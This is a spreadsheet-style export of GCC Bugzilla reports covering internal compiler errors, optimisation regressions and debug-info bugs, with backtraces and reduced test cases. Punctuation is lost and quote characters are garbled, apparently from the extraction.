Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.0 20161030 (experimental) [trunk revision 241684] (GCC) 
$ 
$ gcc-trunk -O1 -c small.c
$ gcc-6.2 -Os -c small.c
$ 
$ gcc-trunk -Os -c small.c
small.c: In function â€˜fn1â€™:
small.c:3:6: internal compiler error: Segmentation fault
 void fn1()
      ^~~
0xbedacf crash_signal
        ../../gcc-source-trunk/gcc/toplev.c:338
0x12dfed1 vec::operator[](unsigned int)
        ../../gcc-source-trunk/gcc/vec.h:732
0x12dfed1 vec::operator[](unsigned int)
        ../../gcc-source-trunk/gcc/vec.h:1216
0x12dfed1 get_alias_type_for_stmts
        ../../gcc-source-trunk/gcc/gimple-ssa-store-merging.c:941
0x12dfed1 output_merged_store
        ../../gcc-source-trunk/gcc/gimple-ssa-store-merging.c:1129
0x12dfed1 output_merged_stores
        ../../gcc-source-trunk/gcc/gimple-ssa-store-merging.c:1213
0x12dfed1 terminate_and_process_chain
        ../../gcc-source-trunk/gcc/gimple-ssa-store-merging.c:1251
0x12dfed1 terminate_and_release_chain
        ../../gcc-source-trunk/gcc/gimple-ssa-store-merging.c:833
0x12e0d38 terminate_all_aliasing_chains
        ../../gcc-source-trunk/gcc/gimple-ssa-store-merging.c:811
0x12e120e execute
        ../../gcc-source-trunk/gcc/gimple-ssa-store-merging.c:1456
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
-------------------------------
int a b[1][2] 
void fn1() 
{
  for (a = 0 a &lt; 2 a++)
    b[-1][a] = 0
}</t>
  </si>
  <si>
    <t>GCC-52580</t>
  </si>
  <si>
    <t>[4.8 Regression] 171.swim performance drop on x86 â€“ vectorization doesnâ€™t happen anymore</t>
  </si>
  <si>
    <t>Regression could be seen on Sandy Bridge. Change set analysis points to commit 
commit 95539e1deabbaa9dbc84b1d81ce6d0c8e7156a0f
Author: rguenth 
Date:   Fri Mar 2 14:58:55 2012 +0000
    2012-03-02  Richard Guenther  
        PR tree-optimization/52406
        * tree-data-ref.h: Update documentation about DR_BASE_OBJECT.
        (struct indices): Add unconstrained_base member.
        (struct dr_alias): Remove unused vops member.
        (DR_UNCONSTRAINED_BASE): New define.
        * tree-data-ref.c (dr_analyze_indices): For COMPONENT_REFs
        add indices to allow their disambiguation.  Make DR_BASE_OBJECT
        be an artificial access that covers the whole indexed object
        or mark it with DR_UNCONSTRAINED_BASE if we cannot do so.  Canonicalize
        plain decl base-objects to their MEM_REF variant.
        (dr_may_alias_p): When the base-object of either data reference
        has unknown size use only points-to information.
        (compute_affine_dependence): Make dumps easier to read and
        more verbose.
        * tree-vect-data-ref.c (vector_alignment_reachable_p): Use
        DR_REF when looking for packed references.
        (vect_supportable_dr_alignment): Likewise.
        * gcc.dg/torture/pr52406.c: New testcase.
    git-svn-id: svn+ssh://gcc.gnu.org/svn/gcc/trunk@184789 138bc75d-0d04-0410-961f-82ee72b054a4
There are vectorizer problems. Vectorization doesnâ€™t happened for the hottest routines calc2() and calc3().
Command line to reproduce
gfortran -g -static -m32 -S -O3 -funroll-loops -msse2 -mfpmath=sse -ffast-math -march=corei7 swim.f
gcc â€“v
Using built-in specs.
COLLECT_GCC=/gnumnt/msticlxl16_users/vbyakovl/workspaces/619/install-exp/bin/gcc
COLLECT_LTO_WRAPPER=/gnumnt/msticlxl16_users/vbyakovl/workspaces/619/install-exp/bin/../libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc/configure --prefix=/export/users/vbyakovl/workspaces/619/install-exp --disable-bootstrap --enable-languages=cc++fortran CFLAGS=-g3 
Thread model: posix
gcc version 4.8.0 20120312 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-32831</t>
  </si>
  <si>
    <t>Some warning on bootstrap....</t>
  </si>
  <si>
    <t>build/gengtype
warning: structure `eh_range' used but not defined
warning: structure `jdeplist_s' used but not defined
warning: structure `java_lexer' used but not defined
warning: structure `ZipDirectory' used but not defined
warning: structure `VEC_cp_token_position_heap' used but not defined
warning: structure `c_arg_info' used but not defined
warning: structure `c_switch' used but not defined
warning: structure `et_node' used but not defined
warning: structure `loop' used but not defined
warning: structure `ipa_reference_vars_info_d' used but not defined
warning: structure `reg_info_def' used but not defined
warning: structure `value_set' used but not defined
warning: structure `eh_range' used but not defined
warning: structure `jdeplist_s' used but not defined
warning: structure `java_lexer' used but not defined
warning: structure `ZipDirectory' used but not defined
warning: structure `VEC_cp_token_position_heap' used but not defined
warning: structure `c_arg_info' used but not defined
warning: structure `c_switch' used but not defined
warning: structure `et_node' used but not defined
warning: structure `loop' used but not defined
warning: structure `ipa_reference_vars_info_d' used but not defined
warning: structure `reg_info_def' used but not defined
warning: structure `value_set' used but not defined</t>
  </si>
  <si>
    <t>cnstar9988</t>
  </si>
  <si>
    <t>GCC-4088</t>
  </si>
  <si>
    <t>Testing GNATSWEB please discard</t>
  </si>
  <si>
    <t>Testing GNATSWEB interface please discard this PR.
Release:
unknown</t>
  </si>
  <si>
    <t>junk</t>
  </si>
  <si>
    <t>GCC-51675</t>
  </si>
  <si>
    <t>[C++11][4.7 Regression] Cannot create constexpr unions</t>
  </si>
  <si>
    <t>union foo
{
	int x = 0
	short y
	constexpr foo() = default
}
This code compiles under GCC 4.6 however not GCC 4.7.  It works if I remove the constexpr keyword.
Output of GCC:
test.cc:6:12: error: explicitly defaulted function â€˜constexpr foo::foo()â€™ cannot be declared as constexpr because the implicit declaration is not constexpr:
test.cc:4:8: note: defaulted default constructor does not initialize â€˜short int foo::yâ€™
If I provide only one initialization it tells me that the others are initialized.  If I initialize the others it tells me that I can't initialize more than one.  It essentially prevents the creation of constexpr unions.</t>
  </si>
  <si>
    <t>GCC-79372</t>
  </si>
  <si>
    <t>ICE on C++ code with illegal decomposition declaration on x86_64-linux-gnu: in tsubst_decomp_names at cp/pt.c:15599</t>
  </si>
  <si>
    <t>$ g++-trunk -v
Using built-in specs.
COLLECT_GCC=g++-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.1/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.1 20170203 (experimental) [trunk revision 245142] (GCC) 
$ 
$ g++-trunk -c -std=c++1z small.cpp
small.cpp: In member function â€˜void S::f()â€™:
small.cpp:4:20: error: cannot decompose non-array non-class type â€˜intâ€™
   void f () { auto [x] = 0 }
                    ^~~
small.cpp: In instantiation of â€˜void S::f() [with T = int]â€™:
small.cpp:10:8:   required from here
small.cpp:4:20: internal compiler error: in tsubst_decomp_names at cp/pt.c:15599
0x70aa06 tsubst_decomp_names
        ../../gcc-source-trunk/gcc/cp/pt.c:15599
0x6f56db tsubst_expr(tree_node* tree_node* int tree_node* bool)
        ../../gcc-source-trunk/gcc/cp/pt.c:15773
0x6f1da3 tsubst_expr(tree_node* tree_node* int tree_node* bool)
        ../../gcc-source-trunk/gcc/cp/pt.c:15879
0x6ef204 instantiate_decl(tree_node* bool bool)
        ../../gcc-source-trunk/gcc/cp/pt.c:22818
0x73e5a2 instantiate_pending_templates(int)
        ../../gcc-source-trunk/gcc/cp/pt.c:22939
0x783a01 c_parse_final_cleanups()
        ../../gcc-source-trunk/gcc/cp/decl2.c:4525
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
-------------------------------------
template  struct S
{
  enum E { A }
  void f () { auto [x] = 0 }
}
int main ()
{
  S  s
  s.f ()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-51842</t>
  </si>
  <si>
    <t>fortran fails if ssize_t is 32-bit on 64-bit host</t>
  </si>
  <si>
    <t>fortran fails if ssize_t is 32-bits on a 64-bit (LP64) host.  The runtime and codegen disagree over the size of fields.  Either the codegen should match the runtime or the runtime should match the codegen.
From libgfortran.h:
/* The following two definitions must be consistent with the types used                        
   by the compiler.  */
/* The type used of array indices amongst other things.  */
typedef ssize_t index_type
typedef struct descriptor_dimension
{
  index_type _stride
  index_type _lbound
  index_type _ubound
}
descriptor_dimension
#define GFC_ARRAY_DESCRIPTOR(r type) \
struct {\
  type *data\
  size_t offset\
  index_type dtype\
  descriptor_dimension dim[r]\
}
is but one example of a mismatch.  Better to use size_t or ptrdiff_t uniformly if you want a 64-bit type on a 64-bit pointer host.
Tracking this problem down was very annoying.  I fixed my port to use a 64-bit type for ssize_t (bad port) so I'm fine now.  For the next person you might want to assert that sizeof (size_t) == sizeof (ssize_t) so they can at least find the problem faster if you don't `fix it'.
Thanks.</t>
  </si>
  <si>
    <t>mrs</t>
  </si>
  <si>
    <t>GCC-51326</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE with invalid override</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE on trunk:
========================
struct A
{
  virtual int
}
struct B : A
{
  B
}
========================
bug.cc:6:8: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-54899</t>
  </si>
  <si>
    <t>[4.7 Regression] -fpredictive-commoning and -ftree-vectorize optimizations generate a nonsensical binary which segfaults</t>
  </si>
  <si>
    <t xml:space="preserve">Created attachment 28423
minimal(ish) testcase which reproduces the bug.
When this code is compiled with -O3 (or even just -O1 with -fpredictive-commoning and -ftree-vectorize) gcc generates code which segfaults when run.
The original code was deep inside a template metaprogramming math library. I don't have much experience with templates so I only managed to trim the minimal testcase down to 60 lines. Templates may or may not be needed to trigger the bug it may be possible to completely factor them out.
Version info:
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-unknown-linux-gnu/4.7.2/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /build/src/gcc-4.7.2/configure --prefix=/usr --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=https://bugs.archlinux.org/ --enable-languages=cc++adafortrangoltoobjcobj-c++ --enable-shared --enable-threads=posix --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-clocale=gnu --disable-libstdcxx-pch --enable-libstdcxx-time --enable-gnu-unique-object --enable-linker-build-id --with-ppl --enable-cloog-backend=isl --disable-ppl-version-check --disable-cloog-version-check --enable-lto --enable-gold --enable-ld=default --enable-plugin --with-plugin-ld=ld.gold --with-linker-hash-style=gnu --disable-multilib --disable-libssp --disable-build-with-cxx --disable-build-poststage1-with-cxx --enable-checking=release
Thread model: posix
gcc version 4.7.2 (GCC) 
Command line which triggers the bug:
    gcc bug2.ii -o bug -O3 &amp;&amp; ./bug
(no compiler output ./bug will segfault when run)
Looking at the assembly output when disabling predictive commoning there are only 3 changes and if it wasn't for an off-by-0x800000000 error they would be functionally identical.
-O3 -fno-predictive-commoning:
	movsd	(%rdi) %xmm1
	movsd	24(%rdi) %xmm2
	movhpd	8(%rdi) %xmm1
	movhpd	32(%rdi) %xmm2
	movapd	%xmm1 %xmm0
	movsd	16(%rdi) %xmm1
-O3:
	movsd	(%rdi) %xmm1
	movabsq	$34359738384 %rax &lt;-- Inserted
	movsd	24(%rdi) %xmm2
	movhpd	8(%rdi) %xmm1
	movhpd	32(%rdi) %xmm2
	movapd	%xmm1 %xmm0
	movsd	(%rdi%rax) %xmm1 &lt;-- Changed
        </t>
  </si>
  <si>
    <t>phiren</t>
  </si>
  <si>
    <t>GCC-45783</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE in gfc_add_component_ref at fortran/class.c:77</t>
  </si>
  <si>
    <t>Created attachment 21876
Reduced example
Hi all
very recently the attached code broke leading to:
 gfcbug110.f90:56.16:
       p2 =&gt;    v%inquire_inner_product()
                1
Error: Type mismatch in argument 'this' at (1) passed CLASS(vector_class) to CLASS(gradient_class)
gfcbug110.f90:33:0: internal compiler error: in gfc_add_component_ref at fortran/class.c:77
The code compiles fine with 4.5 nagfor 5.2 xlf 13.
Cheers
-ha</t>
  </si>
  <si>
    <t>GCC-7885</t>
  </si>
  <si>
    <t>Mesh2.cpp: In function `int SwapForForcingEdge(Vertex *&amp; Vertex *&amp; TriangleAdjacent &amp; Icoor2 &amp; Icoor2 &amp; Icoor2 &amp; int &amp;)':
Mesh2.cpp:1123: Internal compiler error in `instantiate_virtual_regs_1' at function.c:3881
Please submit a full bug report.
Release:
gcc version 2.95.3 20010315 (SuSE)
Environment:
SuSE 8.0
How-To-Repeat:
cd Bug
g++ -fPIC -g -DNOMAIN -DFREEFEM -DF77_UNDERSCORE -c bug.cpp</t>
  </si>
  <si>
    <t>serge.steer</t>
  </si>
  <si>
    <t>GCC-8256</t>
  </si>
  <si>
    <t>g++ -ggdb does not emmit debug info for subclasses</t>
  </si>
  <si>
    <t xml:space="preserve">	g++ does not seem to generate appropriate code to set a breakpoint
	in a sub-class of a class. Hence if B and C are private
	subclasses declared in a class A gdb is not able to set a break-
	point in a method A::B::foo.
Release:
3.2
Environment:
System: Linux cleopatra 2.4.10-4GB #1 Tue Sep 25 12:33:54 GMT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
Configured with: ./configure --prefix=/net/wavelet/gcc/gcc-3.2 --program-suffix=-3.2 --enable-threads=posix
How-To-Repeat:
	Add the following header file making use of private sub-classes
	then save it as foo.hpp:
	/* snip */
class A {
  class B {
  protected:
    int x
  public:
    B(int y)
      : x(y)
    { }
  }
  class C : public B {
    int y
  public:
    C(void)
    void Hello(void)
  } b
public:
  void Hello(void)
}
	/* snip */
	Save the following code as foo.cpp
	/* snip */
#include 
#include foo.hpp
A::C::C(void)
  : B(1) y(2)
{ }
void A::C::Hello(void)
{
  printf(Hello World!\n)
}
void A::Hello(void)
{
  b.Hello()
}
int main(int argcchar **argv)
{
  A a
  a.Hello()
  return 0
}
	/* snip */
	Compile and link with g++-3.2 -ggdb foo.cpp then debug with
	gdb a.out. Within gdb the following happens when trying to
	set a breakpoint at A::C::foo
GNU gdb 5.2.1
Copyright 2002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686-pc-linux-gnu...
(gdb) break A::C::Hello
the class A does not have any method named C
Hint: try 'A::C::Hello or 'A::C::Hello
(Note leading single quote.)
(gdb)</t>
  </si>
  <si>
    <t>GCC-30761</t>
  </si>
  <si>
    <t>[4.1/4.2 regression] Error: unsupported relocation against sfp</t>
  </si>
  <si>
    <t>This is caused by the lower-subreg patch (adding -fno-split-wide-types is a workaround):
$ ../../xgcc -B../../ -c -O2 -fno-common      -gnatpg -gnata -I- -I../rts -I. -I ../../../../gcc/ada ../../../../gcc/ada/make.adb -c 
/tmp/ccXcjvZm.s: Assembler messages:
/tmp/ccXcjvZm.s:6958: Error: unsupported relocation against sfp
$ grep sfp make.s
        mr 21sfp</t>
  </si>
  <si>
    <t>GCC-7580</t>
  </si>
  <si>
    <t>incorrect/unfortunate DWARF-2 info for static const int class members</t>
  </si>
  <si>
    <t>When compiling C++ code containing classes that have static members (especially unitialized and unreferenced static const int members) GCC generates DWARF-2 debugging information that seems to me incorrect and/or unfortunate in a couple of ways:
* As far as I can tell when generating debugging information for classes containing static data members the declarations for those members are tagged as DW_TAG_variable rather than DW_TAG_member.  These seems to me to clearly go against what the DWARF-2 stardard says I gave some reasons why I believe this (with quotes from the standard) in .  This isn't a serious bug since GDB agrees with GCC on this but I think it's a bug nonetheless.
* Also when compiling code containing a class with a static const integral member that is both uninitialized and unreferenced GCC emits debugging information as if there were a declaration for that member outside of the definition of the class.  I don't have any reason to believe that this is illegal (though it might be) but comments in dwarf2out.c seem to suggest that GCC tries to avoid emitting debugging information in such circumstances and it certainly makes GDB unhappy.  So on the one hand this may well be more of a GDB bug than a GCC bug but on the other hand it's probably unfortunate that GCC is emitting this debugging information given that GCC tries to avoid emitting such information in other similar circumstances.
Release:
GCC 3.1
Environment:
gcc -v says:
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Configured with: ../gcc-3.1/configure --enable-languages=c++
Thread model: single
gcc version 3.1
uname -a says:
Linux jackfruit.Stanford.EDU 2.4.18-5 #1 Mon Jun 10 15:31:48 EDT 2002 i686 unknown
How-To-Repeat:
Compile the following program with GCC 3.1 with debugging turned on:
  class C {
    static const int foo
  }
  int main()
  {
  }
Then look at the debugging information. You'll see debugging info for the struct (which refers to C::foo as a DW_TAG_variable rather than a DW_TAG_member as I mentioned in my first point above) then debugging info for various types then debugging info for main() then debugging info for an empty struct that I assume the compiler generates then debugging info for a declaration of C::foo (this is the declaration that I refer to in my second point above) then debugging info for a type.
To see how the unnecessary second declaration of C::foo affects GDB run GDB on this program then do
  (gdb) b main
  (gdb) run
  (gdb) p C::foo
and you'll see:
  Cannot access memory at address 0x0</t>
  </si>
  <si>
    <t>GCC-82030</t>
  </si>
  <si>
    <t>% cat functional.ii
template  struct A { using type = U }
template  struct B : B::type B::type {
  using type = B
  using B::type::operator()
}
template  struct B { using type = F }
struct {
  template &lt;typename... F
            typename Overload = typename B::type...&gt;::type&gt;
  Overload operator()(F...){}
} a
int main() {
  auto f = a([](int) {} [](float) {})
  f({})
}
 % g++ functional.ii
functional.ii: In function â€˜int main()â€™:
functional.ii:14:7: internal compiler error: Segmentation fault
   f({})
       ^
0x10bc6de3 crash_signal
        ../../gcc/gcc/toplev.c:341
0x102182fc compare_ics
        ../../gcc/gcc/cp/call.c:9564
0x10220a6b joust
        ../../gcc/gcc/cp/call.c:9993
0x10222993 joust
        ../../gcc/gcc/cp/call.c:10431
0x10222993 tourney
        ../../gcc/gcc/cp/call.c:10395
0x1023040b build_op_call_1
        ../../gcc/gcc/cp/call.c:4543
0x1023040b build_op_call(tree_node* vec** int)
        ../../gcc/gcc/cp/call.c:4585
0x1049fc6b finish_call_expr(tree_node* vec** bool bool int)
        ../../gcc/gcc/cp/semantics.c:2502
0x103cdbd7 cp_parser_postfix_expression
        ../../gcc/gcc/cp/parser.c:7124
0x103ee65f cp_parser_unary_expression
        ../../gcc/gcc/cp/parser.c:8248
0x103b49e3 cp_parser_cast_expression
        ../../gcc/gcc/cp/parser.c:9016
0x103b5307 cp_parser_binary_expression
        ../../gcc/gcc/cp/parser.c:9117
0x103b5da7 cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:9404
0x103b9a77 cp_parser_expression
        ../../gcc/gcc/cp/parser.c:9573
0x103ba3f7 cp_parser_expression_statement
        ../../gcc/gcc/cp/parser.c:11071
0x103c843f cp_parser_statement
        ../../gcc/gcc/cp/parser.c:10887
0x103c97a3 cp_parser_statement_seq_opt
        ../../gcc/gcc/cp/parser.c:11214
0x103c9927 cp_parser_compound_statement
        ../../gcc/gcc/cp/parser.c:11168
0x103e776f cp_parser_function_body
        ../../gcc/gcc/cp/parser.c:21624
0x103e776f cp_parser_ctor_initializer_opt_and_function_body
        ../../gcc/gcc/cp/parser.c:21660</t>
  </si>
  <si>
    <t>GCC-46512</t>
  </si>
  <si>
    <t>[4.6 Regression] crtstuff.c:563:1: internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>/home2/dave/gcc-4.6/objdir/./gcc/xgcc -B/home2/dave/gcc-4.6/objdir/./gcc/ -B/hom
e2/dave/opt/gnu/gcc/gcc-4.6.0/hppa-linux/bin/ -B/home2/dave/opt/gnu/gcc/gcc-4.6.
0/hppa-linux/lib/ -isystem /home2/dave/opt/gnu/gcc/gcc-4.6.0/hppa-linux/include 
-isystem /home2/dave/opt/gnu/gcc/gcc-4.6.0/hppa-linux/sys-include    -g -O2 -O2 
-g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmis
sing-prototypes -Wold-style-definition  -isystem ./include  -I. -I. -I../../gcc/
gcc -I../../gcc/gcc/. -I../../gcc/gcc/../include -I../../gcc/gcc/../libcpp/inclu
de  -I../../gcc/gcc/../libdecnumber -I../../gcc/gcc/../libdecnumber/dpd -I../lib
decnumber    -g0 -finhibit-size-directive -fno-inline -fno-exceptions -fno-zero-
initialized-in-bss -fno-toplevel-reorder -fno-tree-vectorize -fno-stack-protecto
r  -I. -I. -I../.././gcc -I../../../gcc/libgcc -I../../../gcc/libgcc/. -I../../.
./gcc/libgcc/../gcc -I../../../gcc/libgcc/../include  -o crtend.o -MT crtend.o -
MD -MP -MF crtend.dep  \
          -c ../../../gcc/libgcc/../gcc/crtstuff.c -DCRT_END
../../../gcc/libgcc/../gcc/crtstuff.c: In function 'frame_dummy':
../../../gcc/libgcc/../gcc/crtstuff.c:372:19: warning: array subscript is above 
array bounds [-Warray-bounds]
../../../gcc/libgcc/../gcc/crtstuff.c: In function '__do_global_ctors_aux':
../../../gcc/libgcc/../gcc/crtstuff.c:566:25: warning: array subscript is below 
array bounds [-Warray-bounds]
../../../gcc/libgcc/../gcc/crtstuff.c:563:1: internal compiler error: Segmentati
on fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [crtend.o] Error 1
make[3]: *** Waiting for unfinished jobs....
make[3]: Leaving directory `/home2/dave/gcc-4.6/objdir/hppa-linux/libgcc'
make[2]: *** [all-stage1-target-libgcc] Error 2
make[2]: Leaving directory `/home2/dave/gcc-4.6/objdir'
make[1]: *** [stage1-bubble] Error 2
make[1]: Leaving directory `/home2/dave/gcc-4.6/objdir'
make: *** [bootstrap] Error 2
Tue Nov 16 16:20:17 PST 2010
(gdb) r
Starting program: /home2/dave/gcc-4.6/objdir/gcc/cc1 -I . -I . -I ../../gcc/gcc -I ../../gcc/gcc/. -I ../../gcc/gcc/../include -I ../../gcc/gcc/../libcpp/include -I ../../gcc/gcc/../libdecnumber -I ../../gcc/gcc/../libdecnumber/dpd -I ../libdecnumber -I . -I . -I ../.././gcc -I ../../../gcc/libgcc -I ../../../gcc/libgcc/. -I ../../../gcc/libgcc/../gcc -I ../../../gcc/libgcc/../include -iprefix /home2/dave/gcc-4.6/objdir/gcc/../lib/gcc/hppa-linux/4.6.0/ -isystem /home2/dave/gcc-4.6/objdir/./gcc/include -isystem /home2/dave/gcc-4.6/objdir/./gcc/include-fixed -MD crtend.d -MF crtend.dep -MP -MT crtend.o -D IN_GCC -D CRT_END -isystem /home2/dave/opt/gnu/gcc/gcc-4.6.0/hppa-linux/include -isystem /home2/dave/opt/gnu/gcc/gcc-4.6.0/hppa-linux/sys-include -isystem ./include ../../../gcc/libgcc/../gcc/crtstuff.c -quiet -dumpbase crtstuff.c -auxbase-strip crtend.o -g -g -g0 -O2 -O2 -O2 -Wextra -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -version -finhibit-size-directive -fno-inline -fno-exceptions -fno-zero-initialized-in-bss -fno-toplevel-reorder -fno-tree-vectorize -fno-stack-protector -o xxx.s
GNU C (GCC) version 4.6.0 20101116 (experimental) [trunk revision 166834] (hppa-linux)
	compiled by GNU C version 4.3.3 GMP version 4.3.2 MPFR version 3.0.0-p3 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU C (GCC) version 4.6.0 20101116 (experimental) [trunk revision 166834] (hppa-linux)
	compiled by GNU C version 4.3.3 GMP version 4.3.2 MPFR version 3.0.0-p3 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 14ecb7365bef8f219b8d7d1f9ab6f8f0
../../../gcc/libgcc/../gcc/crtstuff.c: In function '__do_global_ctors_aux':
../../../gcc/libgcc/../gcc/crtstuff.c:566:25: warning: array subscript is below array bounds [-Warray-bounds]
Program received signal SIGSEGV Segmentation fault.
0x02c78148 in pa_function_arg_boundary (mode=SImode type=0x0)
    at ../../gcc/gcc/config/pa/pa.c:9611
9611	  tree size = TYPE_SIZE (type)
(gdb) bt
#0  0x02c78148 in pa_function_arg_boundary (mode=SImode type=0x0)
    at ../../gcc/gcc/config/pa/pa.c:9611
#1  0x00bfc58c in locate_and_pad_parm (passed_mode=SImode type=0x0 
    in_regs=1 partial=0 fndecl=0x0 initial_offset_ptr=0xfdf020a0 
    locate=0xfdf02138) at ../../gcc/gcc/function.c:3699
#2  0x00544768 in emit_library_call_value_1 (retval=7 orgfun=0x0 value=0x1 
    fn_type=LCT_NORMAL outmode=VOIDmode nargs=-34594656 p=0xfdf02138)
    at ../../gcc/gcc/calls.c:3540
#3  0x0122bb40 in build_libfunc_function (name=0x7 )
    at ../../gcc/gcc/optabs.c:6013
Backtrace stopped: previous frame inner to this frame (corrupt stack?)
(gdb) p type
$1 = (const_tree) 0x0</t>
  </si>
  <si>
    <t>GCC-48551</t>
  </si>
  <si>
    <t>Following source code crashes the c++ compiler on coldfire platform.</t>
  </si>
  <si>
    <t>m68k-atari-mint-g++ -v -fomit-frame-pointer -mcpu=5475 -g -O2 -DHAVE_CONFIG_H -I.. -I./../goo -I./../fofi -I.   -c Splash.ii 
Using built-in specs.
COLLECT_GCC=m68k-atari-mint-g++
COLLECT_LTO_WRAPPER=/home/mikro/gnu-tools/libexec/gcc/m68k-atari-mint/4.5.2/lto-wrapper
Target: m68k-atari-mint
Configured with: ../gcc-4.5.2/configure --target=m68k-atari-mint --prefix=/home/mikro/gnu-tools --enable-languages=cc++ --disable-nls --disable-libstdcxx-pch 'CFLAGS_FOR_TARGET=-O2 -fomit-frame-pointer' 'CXXFLAGS_FOR_TARGET=-O2 -fomit-frame-pointer'
Thread model: single
gcc version 4.5.2 (MiNT 20110206) (GCC) 
COLLECT_GCC_OPTIONS='-v' '-fomit-frame-pointer' '-mcpu=5475' '-g' '-O2' '-DHAVE_CONFIG_H' '-I..' '-I./../goo' '-I./../fofi' '-I.' '-c'
 /home/mikro/gnu-tools/libexec/gcc/m68k-atari-mint/4.5.2/cc1plus -fpreprocessed Splash.ii -quiet -dumpbase Splash.ii -mcpu=5475 -auxbase Splash -g -O2 -version -fomit-frame-pointer -o /tmp/ccEwEpj3.s
GNU C++ (GCC) version 4.5.2 (MiNT 20110206) (m68k-atari-mint)
        compiled by GNU C version 4.4.3 GMP version 4.3.2 MPFR version 2.4.2-p1 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C++ (GCC) version 4.5.2 (MiNT 20110206) (m68k-atari-mint)
        compiled by GNU C version 4.4.3 GMP version 4.3.2 MPFR version 2.4.2-p1 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 7c132bafa38d6cea47b5bd54ad75cb89
Splash.cc: In member function 'void Splash::flattenCurve(SplashCoord SplashCoord SplashCoord SplashCoord SplashCoord SplashCoord SplashCoord SplashCoord SplashCoord* SplashCoord SplashPath*)':
Splash.cc:1380:1: error: unrecognizable insn:
(insn 385 384 20 2 Splash.cc:1320 (set (reg:DF 16 %fp0)
        (mem/c/i:DF (plus:SI (reg/f:SI 15 %sp)
                (reg:SI 0 %d0)) [3 x0+0 S8 A32])) -1 (nil))
Splash.cc:1380:1: internal compiler error: in extract_insn at recog.c:2103
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
It's true m68k-atari-mint is not officially supported but I believe this is common coldfire problem. For example if I replace -mcpu=5475 with -m68020-60 it works like a charm.</t>
  </si>
  <si>
    <t>miro.kropacek</t>
  </si>
  <si>
    <t>GCC-60420</t>
  </si>
  <si>
    <t>[DR 1510] Bogus error: â€˜constâ€™ qualifiers cannot be applied to â€˜int&amp;â€™ with lambda</t>
  </si>
  <si>
    <t>Google ref: b/13305941
Using current (r208339) trunk:
g++ -c -std=c++11 t.cc
t.cc: In instantiation of â€˜struct fn(Iterator Iterator) [with Iterator = __gnu_cxx::__normal_iterator &gt;]::â€™:
t.cc:6:45:   required from â€˜void fn(Iterator Iterator) [with Iterator = __gnu_cxx::__normal_iterator &gt;]â€™
t.cc:11:26:   required from here
t.cc:6:38: error: â€˜constâ€™ qualifiers cannot be applied to â€˜int&amp;â€™
   auto x = [](const decltype(*begin) b) { }
                                      ^
t.cc: In instantiation of â€˜struct fn(Iterator Iterator) [with Iterator = __gnu_cxx::__normal_iterator &gt;]::â€™:
t.cc:6:45:   required from â€˜void fn(Iterator Iterator) [with Iterator = __gnu_cxx::__normal_iterator &gt;]â€™
t.cc:16:26:   required from here
t.cc:6:38: error: â€˜constâ€™ qualifiers cannot be applied to â€˜const int&amp;â€™
Clang accepts this test case. GCC-4.8 gives up with confused by earlier errors bailing out after the first error.
#include 
template 
void fn(Iterator begin Iterator end)
{
  auto x = [](const decltype(*begin) b) { }
}
void foo(std::vector &amp;vi)
{
  fn(vi.begin() vi.end())
}
void bar(const std::vector&amp; vi)
{
  fn(vi.begin() vi.end())
}</t>
  </si>
  <si>
    <t>GCC-83185</t>
  </si>
  <si>
    <t>[8 Regression] ICE with -fsanitize=address in build_simple_mem_ref_loc at tree.c:4696</t>
  </si>
  <si>
    <t>With option -fsanitize=address and -Os|1+ :
$ cat z1.c
#include 
void
f (int i ...)
{
  va_list aps[g()]
  va_start (aps[4] i)
}
$ gcc-8-20171126 -c z1.c -O2 -fsanitize=address
z1.c: In function 'f':
z1.c:6:15: warning: implicit declaration of function 'g' [-Wimplicit-function-declaration]
   va_list aps[g()]
               ^
during RTL pass: expand
In file included from z1.c:1:
z1.c:7:3: internal compiler error: in build_simple_mem_ref_loc at tree.c:4696
   va_start (aps[4] i)
   ^~~~~~~~
0xd037df build_simple_mem_ref_loc(unsigned int tree_node*)
        ../../gcc/tree.c:4696
0xd78a55 ix86_va_start
        ../../gcc/config/i386/i386.c:9803
0x72f443 expand_builtin_va_start
